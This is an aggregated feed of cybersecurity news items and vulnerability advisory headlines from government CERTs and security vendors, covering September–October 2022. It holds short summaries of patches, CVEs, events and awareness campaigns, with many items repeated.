Mozilla has published the advisories (MFSA2022-44 and MFSA2022-45) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
C-DAYS Açores 2022
2022-10-19T00:00:00Z | 1666137600

A 9ª edição da C-DAYS, dedicada ao tema “Apostar na Prevenção”, é o ponto de encontro de profissionais e amadores da área da cibersegurança que proporciona o ambiente ideal para a partilha de conhecimento, visões e práticas de cibersegurança.No dia 27 de Outubro de 2022 no Pavilhão do Mar, a conferência C-DAYS AÇORES 2022 irá reunir oradores de diferentes áreas (decisores, profissionais, académicos, estudantes e comunidade em geral) para discutir e promover a reflexão nestas matérias, com vista ao incremento do nível de maturidade de cibersegurança do ecossistema nacional.Para mais informações, visite https://www.c-days.cncs.gov.pt/ .

https://dyn.cncs.gov.pt/pt/detalhe/art/135702/c-days-acores-2022
Webinar: A “whole-of-health” approach to cybersecurity
2022-10-18T15:41:00Z | 1666107660

The U.S. healthcare sector alone has experienced a 94% increase in ransomware attacks year over year (2021). Payers and employers face the same cyber threats given that adversaries, including nation-states, often are after the same thing: valuable patient information. In this on-demand webinar, Hear from industry peers and IronNet Co-CEO General (Ret) Keith Alexander on how to create a more secure healthcare ecosystem across payers, providers, and employers to protect patient data and safety, continuity of care, and facility uptime.

https://www.ironnet.com/resource-library/webinar-a-whole-of-health-approach-to-cybersecurity
A Vote of Confidence for Election Security
2022-10-18T13:00:00Z | 1666098000

CISA has released its free Cybersecurity Toolkit to help election authorities prepare for possible threats. Read more to learn about its offerings.

https://www.akamai.com/blog/security/a-vote-of-confidence-for-election-security
Designing a Security Strategy for the Multi-Cloud Enterprise
2022-10-18T11:06:17Z | 1666091177

Cloud-based deployments provide many benefits to organizations, such as greater scalability, flexibility, and availability than many organizations can achieve in-house. However, cloud infrastructure also comes with its costs, such as the challenges of securing an organization’s on-premises and cloud environments. For organizations making the move to the cloud, redesigning their security strategies to protect multi-cloud... The post Designing a Security Strategy for the Multi-Cloud Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/designing-a-security-strategy-for-the-multi-cloud-enterprise/
Integrated vs Converged SASE: Why it Matters When Ensuring an Optimal Security Posture
2022-10-18T08:40:55Z | 1666082455

The post Integrated vs Converged SASE: Why it Matters When Ensuring an Optimal Security Posture appeared first on Cato Networks.

https://www.catonetworks.com/resources/integrated-vs-converged-sase-why-it-matters-when-ensuring-an-optimal-security-posture/
Continued seasonable cyber weather in September
2022-10-17T13:43:00Z | 1666014180

The leaks in the Nord Stream gas pipelines sparked discussion about potential consequences for Finland’s international telecommunications connections that are provided via submarine cables. Organisations must protect themselves against a zero-day vulnerability in Exchange servers even though the vulnerability is less severe than the one discovered last year. Consumers should remember to consider the security features of smart toys when shopping for Christmas presents. It is smart to read more about toys and their features before making any purchase decisions.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_09/2022
Continued seasonable cyber weather in September
2022-10-17T13:43:00Z | 1666014180

The leaks in the Nord Stream gas pipelines sparked discussion about potential consequences for Finland’s international telecommunications connections that are provided via submarine cables. Organisations must protect themselves against a zero-day vulnerability in Exchange servers even though the vulnerability is less severe than the one discovered last year. Consumers should remember to consider the security features of smart toys when shopping for Christmas presents. It is smart to read more about toys and their features before making any purchase decisions.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_09/2022
Ask us about ransomware!
2022-10-17T12:53:52Z | 1666011232

What are the first signs of a ransomware attack? Who should be informed about an attack? In October, we focus on questions concerning ransomware.

https://www.kyberturvallisuuskeskus.fi/en/news/ask-us-about-ransomware
Ask us about ransomware!
2022-10-17T12:53:52Z | 1666011232

What are the first signs of a ransomware attack? Who should be informed about an attack? In October, we focus on questions concerning ransomware.

https://www.kyberturvallisuuskeskus.fi/en/news/ask-us-about-ransomware
Security Alert (A22-10-15): Multiple Vulnerabilities in Microsoft Edge
2022-10-17T04:00:00Z | 1665979200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Zigzaga na Net recomendado para o Plano Nacional de Leitura
2022-10-17T00:00:00Z | 1665964800

Trata-se de um livro destinado aos mais jovens, que agrupa trinta textos, acessíveis e clarificadores, acerca da utilização segura, saudável e consciente da internet. Um contributo para o desenvolvimento das competências da literacia digital neste que é denominado o Mês das Competências Digitais. Recorde-se que, a criação deste mês surge da área governativa da digitalização e da modernização administrativa, no âmbito da iniciativa INCoDe.2030. Neste âmbito, serão feitas diversas ações dos programas que em Portugal estão a trabalhar na promoção das competências digitais dos portugueses.Para consultar o recurso aceda aqui. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135700/zigzaga-na-net-recomendado-para-o-plano-nacional-de-leitura
Akamai?s Perspective on October?s Patch Tuesday 2022
2022-10-14T17:00:00Z | 1665766800

Every Patch Tuesday stirs up the community. See Akamai's October insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-october-2022
Security Alert (A22-10-13): Vulnerability in SonicWall Global Management System
2022-10-14T04:00:00Z | 1665720000

SonicWall has released a security advisory to address a path traversal vulnerability in SonicWall GMS.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-14): Multiple Vulnerabilities in Ivanti Connect Secure
2022-10-14T04:00:00Z | 1665720000

Ivanti has published a security advisory to address multiple vulnerabilities in Ivanti Connect Secure.

https://www.govcert.gov.hk/en/alerts_detail.php
Robustel R1510 sysupgrade command injection OS command injection vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1576
Robustel R1510 web_server hashFirst denial of service vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1575
Robustel R1510 sysupgrade firmware update vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1580
Robustel R1510 web_server /ajax/remove/ directory traversal vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1579
Robustel R1510 web_server /action/import_authorized_keys/ OS command injection vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1578
Robustel R1510 js_package install OS command injection vulnerability
2022-10-14T00:00:00Z | 1665705600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1577
Protecting State, Local, and Education stakeholders from Cyber Attacks with Collective Defense
2022-10-13T14:34:47Z | 1665671687

Safeguard your data, free up your time, and maximize your resources with a next-gen approach to cybersecurity that brings together public and private sectors for a stronger defense. We protect the public sector with advanced network detection and response (NDR) capabilities combined with a collaborative approach that provides greater visibility of unknown threats. Work from a place of shared understanding for faster response.

https://www.ironnet.com/resource-library/protecting-state-local-and-education-stakeholders-from-cyber-attacks-with-collective-defense
New Gartner Report Identifies Four Missed Tips When Evaluating SASE Platform Capabilities
2022-10-13T12:01:38Z | 1665662498

Gartner has long been clear about the core capabilities that comprise a SASE solution. And as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE, Cato meets those capabilities delivering SWG, CASB, ZTNA, SD-WAN, FWaaS, and Malware inspection all at line-rate operation even when decrypting traffic.   While a single platform providing those... The post New Gartner Report Identifies Four Missed Tips When Evaluating SASE Platform Capabilities appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-gartner-report-identifies-four-missed-tips-when-evaluating-sase-platform-capabilities/
GMS File Path Manipulation
2022-10-13T09:40:00Z | 1665654000

An unauthenticated attacker can gain access to web directory containing application's binaries and configuration files through file path manipulation vulnerability. CVE: CVE-2021-20030 Last updated: Oct. 13, 2022, 9:40 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0021
Impact study CSIRT’s in the framework of the reformed Network- and Information Security Directive
2022-10-12T17:50:00Z | 1665597000

In June 2022, a political agreement has been reached in the reform of the Network- and Information Security Directive (NIS). This reform is driven by development in technologies, the ever-increasing digitalisation of society, increasing dependence on information- and security networks in combination with new and existing threats. The new NIS2-Directive entails an expansion of tasks and competences of Computer Security Incident Response Teams (CSIRTs) compared to NIS1. It is a broadening of the scope, as well as the kind of CSIRT-tasks. NCSC-NL has commissioned Tilburg University to conduct an impact study on its own organisations and its activities, following this reform.

https://english.ncsc.nl/latest/news/2022/october/13/index
Akamai Wins Brandon Hall Gold Award in Extended Enterprise Learning
2022-10-12T13:00:00Z | 1665579600

For the third consecutive year, Akamai Global Services has won the coveted Gold Award from Brandon Hall Group.

https://www.akamai.com/blog/news/akamai-wins-brandon-hall-gold-award-extended-enterprise-learning
Porting the Solana eBPF JIT compiler to ARM64
2022-10-12T12:00:55Z | 1665576055

Andrew Haberlandt  During my summer internship at Trail of Bits, I worked on the fork of the RBPF JIT compiler that is used to execute Solana smart contracts. The RBPF JIT compiler plays a critical role on the Solana blockchain, as it facilitates the execution of contracts on validator nodes by default. Before my […]

https://blog.trailofbits.com/2022/10/12/solana-jit-compiler-ebpf-arm64/
New version of cybermeter available – training events start on 10 October
2022-10-12T11:48:54Z | 1665575334

The National Cyber Security Centre Finland (NCSC-FI) at Traficom published in 2020 the Kybermittari (Cybermeter) tool for evaluating and improving cyber security in organisations. The tool helps organisations evaluate the status of their cyber security and identify areas with room for improvement. The tool has been further developed, and the new version is available on the NCSC-FI website. You can now register for Kybermittari presentation and training events that are open to all.

https://www.kyberturvallisuuskeskus.fi/en/news/new-version-cybermeter-available-training-events-start-10-october
New version of cybermeter available – training events start on 10 October
2022-10-12T11:48:54Z | 1665575334

The National Cyber Security Centre Finland (NCSC-FI) at Traficom published in 2020 the Kybermittari (Cybermeter) tool for evaluating and improving cyber security in organisations. The tool helps organisations evaluate the status of their cyber security and identify areas with room for improvement. The tool has been further developed, and the new version is available on the NCSC-FI website. You can now register for Kybermittari presentation and training events that are open to all.

https://www.kyberturvallisuuskeskus.fi/en/news/new-version-cybermeter-available-training-events-start-10-october
European Cybersecurity Month begins – see top tips for security
2022-10-12T11:46:56Z | 1665575216

October is the month for brushing up on basic cyber security skills. Follow the campaign on social media with the hashtags #Choose2BeSafeOnline and #ThinkB4UClick.

https://www.kyberturvallisuuskeskus.fi/en/news/european-cybersecurity-month-begins-see-top-tips-security
European Cybersecurity Month begins – see top tips for security
2022-10-12T11:46:56Z | 1665575216

October is the month for brushing up on basic cyber security skills. Follow the campaign on social media with the hashtags #Choose2BeSafeOnline and #ThinkB4UClick.

https://www.kyberturvallisuuskeskus.fi/en/news/european-cybersecurity-month-begins-see-top-tips-security
Submarine cables are the backbone of the internet
2022-10-12T11:45:14Z | 1665575114

The leaks in the Nord Stream gas pipelines have understandably caused concern over the functioning of international data connections. Finland’s connectivity with the rest of the world is built on multiple connections, and the internet is very resilient, despite the possibility of failures and disturbances. We work continuously with other operators to protect and safeguard the communications network infrastructure and to prevent, detect and fix any issues.

https://www.kyberturvallisuuskeskus.fi/en/news/submarine-cables-are-backbone-internet
Submarine cables are the backbone of the internet
2022-10-12T11:45:14Z | 1665575114

The leaks in the Nord Stream gas pipelines have understandably caused concern over the functioning of international data connections. Finland’s connectivity with the rest of the world is built on multiple connections, and the internet is very resilient, despite the possibility of failures and disturbances. We work continuously with other operators to protect and safeguard the communications network infrastructure and to prevent, detect and fix any issues.

https://www.kyberturvallisuuskeskus.fi/en/news/submarine-cables-are-backbone-internet
Welcome to the information security seminar Tietoturva 2022 on 25 October 2022
2022-10-12T11:42:19Z | 1665574939

Our popular information security seminar is here again! The seminar Tietoturva 2022 will be held at Tennispalatsi in Helsinki on Tuesday 25 October from 9:00 to 16:30. You can attend in person or online. The programme in the morning is targeted at executive audiences and the talks after lunch at cyber security experts. You are also welcome to attend both parts of the day!

https://www.kyberturvallisuuskeskus.fi/en/news/welcome-information-security-seminar-tietoturva-2022-25-october-2022
Welcome to the information security seminar Tietoturva 2022 on 25 October 2022
2022-10-12T11:42:19Z | 1665574939

Our popular information security seminar is here again! The seminar Tietoturva 2022 will be held at Tennispalatsi in Helsinki on Tuesday 25 October from 9:00 to 16:30. You can attend in person or online. The programme in the morning is targeted at executive audiences and the talks after lunch at cyber security experts. You are also welcome to attend both parts of the day!

https://www.kyberturvallisuuskeskus.fi/en/news/welcome-information-security-seminar-tietoturva-2022-25-october-2022
High Threat Security Alert (A22-10-09): Multiple Vulnerabilities in Microsoft Products (October 2022)
2022-10-12T04:00:00Z | 1665547200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-10): Multiple Vulnerabilities in Google Chrome
2022-10-12T04:00:00Z | 1665547200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-11): Vulnerability in VMware Aria Operations
2022-10-12T04:00:00Z | 1665547200

VMware has published a security advisory to address multiple vulnerability in VMware Aria Operations.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-12): Multiple Vulnerabilities in Adobe Reader/Acrobat
2022-10-12T04:00:00Z | 1665547200

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
How a Managed Firewall Can Help Close Corporate Security Gaps
2022-10-11T11:56:32Z | 1665489392

As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the organization against cyber attacks. However, many security teams lack the resources and personnel to keep pace of their expanding duties.   As security teams become overwhelmed, identifying ways to ease their... The post How a Managed Firewall Can Help Close Corporate Security Gaps appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-a-managed-firewall-can-help-close-corporate-security-gaps/
NCSC publishes Research Agenda 2023 - 2026
2022-10-11T11:14:00Z | 1665486840

One of the pillars of NCSC is sharing knowledge with its target groups and cooperation partners. The research team contributes to the NCSC mission of "understanding, connecting and preventing" by interpreting scientific developments in the cybersecurity field and conducting, outsourcing and supervising relevant research. The Research Agenda 2023-2026 describes the ambitions for the coming period.

https://english.ncsc.nl/latest/news/2022/october/11/ncsc-publishes-research-agenda-2023---2026
Cold Hard Cache ? Bypassing RPC Interface Security with Cache Abuse
2022-10-11T07:00:00Z | 1665471600

https://www.akamai.com/blog/security-research/cold-hard-cache-bypassing-rpc-with-cache-abuse
Security Alert (A22-10-07): Vulnerability in Apple iOS
2022-10-11T04:00:00Z | 1665460800

Apple has released iOS 16.0.3 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-08): Multiple Vulnerabilities in Fortinet Products
2022-10-11T04:00:00Z | 1665460800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products in addition to the remote authentication bypass vulnerability (CVE-2022-40684) mentioned in security alert (A22-10-05).

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-41671
2022-10-11T00:00:00Z | 1665446400

CWE-89: Improper Neutralization of Special Elements used in SQL Command (‘SQL Injection’): A vulnerability exists that allows adversaries with local user privileges to craft a malicious SQL query and execute as part of project migration which could result in execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41671
CVE-2022-41670
2022-10-11T00:00:00Z | 1665446400

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): A vulnerability exists in the SGIUtility component that allows adversaries with local user privileges to load malicious DLL which could result in execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41670
CVE-2022-41669
2022-10-11T00:00:00Z | 1665446400

CWE-347: Improper Verification of Cryptographic Signature: A vulnerability exists in the SGIUtility component that allows adversaries with local user privileges to load a malicious DLL which could result in execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41669
CVE-2022-41668
2022-10-11T00:00:00Z | 1665446400

CWE-704: Incorrect Project Conversion: A vulnerability exists that allows adversaries with local user privileges to load a project file from an adversary-controlled network share which could result in execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41668
CVE-2022-41667
2022-10-11T00:00:00Z | 1665446400

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): A vulnerability exists that allows adversaries with local user privileges to load a malicious DLL which could lead to execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41667
CVE-2022-41666
2022-10-11T00:00:00Z | 1665446400

CWE-347: Improper Verification of Cryptographic Signature: A vulnerability exists that allows adversaries with local user privileges to load a malicious DLL which could lead to execution of malicious code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-41666
CVE-2022-38465
2022-10-11T00:00:00Z | 1665446400

CWE-522: Insufficiently Protected Credentials Affected products protect the built-in global private key in a way that cannot be considered sufficient any longer. The key is used for the legacy protection of confidential configuration data and the legacy PG/PC and HMI communication. This could allow attackers to discover the private key of a CPU product family by an offline attack against a single CPU of the family. Attackers could then use this knowledge to extract confidential configuration data from projects that are protected by that key or to perform attacks against legacy PG/PC and HMI communication. Read Team82's report: "The Race to Native Code Execution in PLCs: Using RCE to Uncover Siemens SIMATIC S7-1200/1500 Hardcoded Cryptographic Keys"

https://claroty.com/team82/disclosure-dashboard/cve-2022-38465
The Internet Architecture Board Takes on Sustainability
2022-10-10T13:00:00Z | 1665406800

Join Akamai and the Internet Architecture Board to make #shift happen. Let's work together to make life better for billions of people, billions of times a day. #GreenWithAkamai

https://www.akamai.com/blog/sustainability/the-internet-architecture-board-takes-on-sustainability
Olukord küberruumis – september 2022
2022-10-10T06:00:00Z | 1665381600

Septembris registreerisime 200 mõjuga intsidenti, mis on viimase poole aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-september-2022
High Threat Security Alert (A22-10-05): Vulnerability in FortiOS and FortiProxy
2022-10-10T04:00:00Z | 1665374400

Fortinet released security advisories to address a vulnerability in FortiOS and FortiProxy software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-06): Multiple Vulnerabilities in VMware Products
2022-10-10T04:00:00Z | 1665374400

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
VMware vCenter Server Platform Services Controller Unsafe Deserialization vulnerability
2022-10-10T00:00:00Z | 1665360000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587
20 aastaga on Eestis antud üle 800 miljoni digiallkirja
2022-10-08T06:00:00Z | 1665208800

2002. aasta 7. oktoobril kell 14.10 digiallkirjastasid Tallinna ja Tartu linnapea linnadevahelise koostööleppe. See oli esimene digiallkiri ning praeguseks on 20 aastaga ID-kaardi, mobiil-ID ja Smart-IDga antud rohkem kui 800 miljonit signatuuri.

https://ria.ee/uudised/20-aastaga-eestis-antud-ule-800-miljoni-digiallkirja
Holiday Readiness, Part II: Best Practices for Detecting and Mitigating Attacks
2022-10-07T13:00:00Z | 1665147600

Stay one step ahead of bad actors this holiday season with best practices to detect and mitigate attacks.

https://www.akamai.com/blog/security/holiday-readiness-best-practices-detecting-mitigating-attacks
Trendid ja tähelepanekud küberruumis – III kvartal 2022
2022-10-07T06:00:00Z | 1665122400

RIA kvartaliülevaade võtab kokku viimase kolme kuu tähtsamad kübersündmused Eestis ja maailmas.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-iii-kvartal-2022
Edge DNS and the Top-Level Domain Hosting
2022-10-06T13:00:00Z | 1665061200

Akamai Edge DNS offers the scale and functionality to meet ICANN?s intensive requirements for hosting a generic top-level domain (gTLD) zone in DNS.

https://www.akamai.com/blog/edge/edge-dns-and-the-top-level-domain-hosting
Security Alert (A22-10-04): Multiple Vulnerabilities in Cisco Products
2022-10-06T04:00:00Z | 1665028800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Working on blockchains as a Trail of Bits intern
2022-10-05T13:00:42Z | 1664974842

Earlier this year, I successfully completed my internship at Trail of Bits and secured a full-time position as a Blockchain Security Analyst. This post is not intended to be a technical description of the work I did during my internship. Rather, it is intended to describe my general experience as a […]

https://blog.trailofbits.com/2022/10/05/trail-of-bits-internship-blockchain-tealer/
Akamai Mitigates Hop-by-Hop Header Abuse Leading to Request Smuggling
2022-10-05T13:00:00Z | 1664974800

Security researchers identified and disclosed a new technique of hop-by-hop header attacks, leading to request smuggling, which Akamai successfully mitigated.

https://www.akamai.com/blog/security/akamai-mitigates-hop-by-hop-header-abuse
Security Alert (A22-10-01): Multiple Vulnerabilities in Google Chrome
2022-10-05T04:00:00Z | 1664942400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-02): Multiple Vulnerabilities in Android
2022-10-05T04:00:00Z | 1664942400

Google has released Android Security Bulletin October 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-10-03): Multiple Vulnerabilities in Microsoft Edge
2022-10-05T04:00:00Z | 1664942400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
August cyber weather: rainy in Finland and the world
2022-10-04T13:52:22Z | 1664891542

Based on an analysis of observations over the long term, the NCSC-FI assessed that the cyber threat level in Finland has increased because there is more malicious traffic against Finland and it has become more serious in nature. Phishing and scam campaigns are active, requiring organisations and citizens to remain vigilant. The authorities have still been able to constantly improve cyber security in Finland. For example, the number of scam calls originating in Finland has been significantly reduced with the help of regulatory amendments and close cooperation with telecommunications operators.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2022
August cyber weather: rainy in Finland and the world
2022-10-04T13:52:22Z | 1664891542

Based on an analysis of observations over the long term, the NCSC-FI assessed that the cyber threat level in Finland has increased because there is more malicious traffic against Finland and it has become more serious in nature. Phishing and scam campaigns are active, requiring organisations and citizens to remain vigilant. The authorities have still been able to constantly improve cyber security in Finland. For example, the number of scam calls originating in Finland has been significantly reduced with the help of regulatory amendments and close cooperation with telecommunications operators.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2022
Financial Services Malware Just Won?t Die: What to Do About It?
2022-10-04T13:00:00Z | 1664888400

The continued reemergence of the Emotet malware is keeping cybersecurity professionals on their toes. Zero Trust solutions are here to help.

https://www.akamai.com/blog/security/financial-services-malware-just-wont-die
Pärast Venemaa kallaletungi on küberruumis tulisem
2022-10-04T05:00:24Z | 1664859624

Riigi Infosüsteemi Ameti (RIA) hinnangul on see aasta Eesti küberruumis tavapärasest tulisem. Inimeste netikaitse tõstmiseks algas kampaania „Kontrolli üle!“, mis näitab, kuidas veebimaastikul end jahutada.

https://ria.ee/uudised/parast-venemaa-kallaletungi-kuberruumis-tulisem
Hancom Office 2020 Hword Docx XML parsing heap underflow vulnerability
2022-10-04T00:00:00Z | 1664841600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1574
Secure your machine learning with Semgrep
2022-10-03T13:00:53Z | 1664802053

tl;dr: Our publicly available Semgrep ruleset now has 11 rules dedicated to the misuse of machine learning libraries. Try it out now! Picture this: You’ve spent months curating images, trying out different architectures, downloading pretrained models, messing with Kubernetes, and you’re finally ready to ship your sparkling new machine learning (ML) product. […]

https://blog.trailofbits.com/2022/10/03/semgrep-maching-learning-static-analysis/
Akamai?s Response to Zero-Day Vulnerabilities in Microsoft Exchange Server (CVE-2022-41040 and CVE-2022-41082)
2022-10-03T09:00:00Z | 1664787600

Akamai Security Research has released web application firewall protections for Microsoft Exchange CVE-2022-41040 and CVE-2022-41082.

https://www.akamai.com/blog/security-research/akamais-response-zero-day-vulnerabilities-microsoft-exchange-server
Akamai Aids India Through Corporate Social Responsibility Partnerships
2022-09-30T13:00:00Z | 1664542800

Akamai?s Corporate Social Responsibility Trust partners with nonprofit organizations to help enhance the lives of people across India.

https://www.akamai.com/blog/culture/akamai-aids-india-through-corporate-social-responsibility-partnerships
Instructions for recovering from cyberattacks
2022-09-30T11:52:11Z | 1664538731

How to recover from a cyberattack? How to determine the extent of the attack and how to stop it? These and many other questions are answered in the practical guides published by the NCSC-FI. The guides are available free of charge on the NCSC-FI website.

https://www.kyberturvallisuuskeskus.fi/en/news/instructions-recovering-cyberattacks
Instructions for recovering from cyberattacks
2022-09-30T11:52:11Z | 1664538731

How to recover from a cyberattack? How to determine the extent of the attack and how to stop it? These and many other questions are answered in the practical guides published by the NCSC-FI. The guides are available free of charge on the NCSC-FI website.

https://www.kyberturvallisuuskeskus.fi/en/news/instructions-recovering-cyberattacks
NCSC-FI's weekly review – 39/2022
2022-09-30T11:50:15Z | 1664538615

This is the NCSC-FI’s weekly review (reporting period 23–29 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kyberturvallisuuskeskuksen-viikkokatsaus-392022
NCSC-FI's weekly review – 39/2022
2022-09-30T11:50:15Z | 1664538615

This is the NCSC-FI’s weekly review (reporting period 23–29 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kyberturvallisuuskeskuksen-viikkokatsaus-392022
NCSC-FI's weekly review – 38/2022
2022-09-30T11:47:57Z | 1664538477

This is the NCSC-FI’s weekly review (reporting period 16–22 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-382022
NCSC-FI's weekly review – 38/2022
2022-09-30T11:47:57Z | 1664538477

This is the NCSC-FI’s weekly review (reporting period 16–22 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-382022
NCSC-FI's weekly review – 37/2022
2022-09-30T11:45:46Z | 1664538346

This is the NCSC-FI’s weekly review (reporting period 9–15 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-372022
NCSC-FI's weekly review – 37/2022
2022-09-30T11:45:46Z | 1664538346

This is the NCSC-FI’s weekly review (reporting period 9–15 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-372022
NCSC-FI's weekly review – 36/2022
2022-09-30T11:27:01Z | 1664537221

This is the NCSC-FI’s weekly review (reporting period 2-8 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-362022
NCSC-FI's weekly review – 36/2022
2022-09-30T11:27:01Z | 1664537221

This is the NCSC-FI’s weekly review (reporting period 2-8 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-362022
NCSC-FI's weekly review – 35/2022
2022-09-30T11:23:54Z | 1664537034

This is the NCSC-FI’s weekly review (reporting period 26 August-1 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-352022
NCSC-FI's weekly review – 35/2022
2022-09-30T11:23:54Z | 1664537034

This is the NCSC-FI’s weekly review (reporting period 26 August-1 September 2022 ). Our weekly reviews contain information about current phenomena in the cyber environment. The review is intended for everyone from cyber security professionals to ordinary people. TLP:CLEAR

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fis-weekly-review-352022
High Threat Security Alert (A22-09-21): Multiple Vulnerabilities in Microsoft Exchange Server
2022-09-30T04:00:00Z | 1664510400

Two zero-day vulnerabilities in Microsoft Exchange Server were observed in multiple attack campaigns.

https://www.govcert.gov.hk/en/alerts_detail.php
Mês Europeu de Cibersegurança arranca hoje!
2022-09-30T00:00:00Z | 1664496000

A Agência da União Europeia para a Cibersegurança (ENISA) promove mais um mês de atividades e campanhas de sensibilização para o mês de outubro. O Mês Europeu da Cibersegurança (ECSM) foi lançado hoje pela Vice-Presidente da Comissão Europeia para a Promoção do nosso Estilo de Vida Europeu, Margaritis Schinas. Neste que é o décimo aniversário da iniciativa, os temas promovidos concentrar-se-ão no phishing e no ransomware, com uma série de atividades que ocorrem em toda a União Europeia (UE), ao longo do mês de outubro. Entre elas estão Conferências, workshops, sessões de formação, webinars e questionários, momentos estes organizados pela ENISA e pelos Estados-Membros. Estas atividades estão disponíveis para os interessados que pretendam participar, através do site do Mês Europeu da Cibersegurança. A fim de promover melhor os materiais de campanha dos Estados-Membros e apresentar as atividades das partes interessadas, a ENISA adicionou os Prémios ECSM à campanha pela primeira vez este ano. Recorde-se que o objetivo da campanha do ECSM passa por fortalecer a resiliência dos sistemas e serviços da UE, permitindo com que os cidadãos atuem como “firewalls humanos eficazes” e, assim, deem um passo em frente na direção de uma sociedade mais cibersegura. Em particular, a edição de 2022 do ECSM visa atingir profissionais com idades compreendidas entre os 40 e os 60 anos de todos os setores da economia, com especial enfoque nas PME’s. Destina-se também a toda a comunidade empresarial europeia e a pessoas individuais cujo trabalho depende de tecnologias e ferramentas digitais. O Mês Europeu da Cibersegurança lançado pela primeira vez em 2012, sendo que atualmente é considerado parte integrante das ações destinadas a implementar as disposições da Lei de Cibersegurança da UE sobre sensibilização e educação.

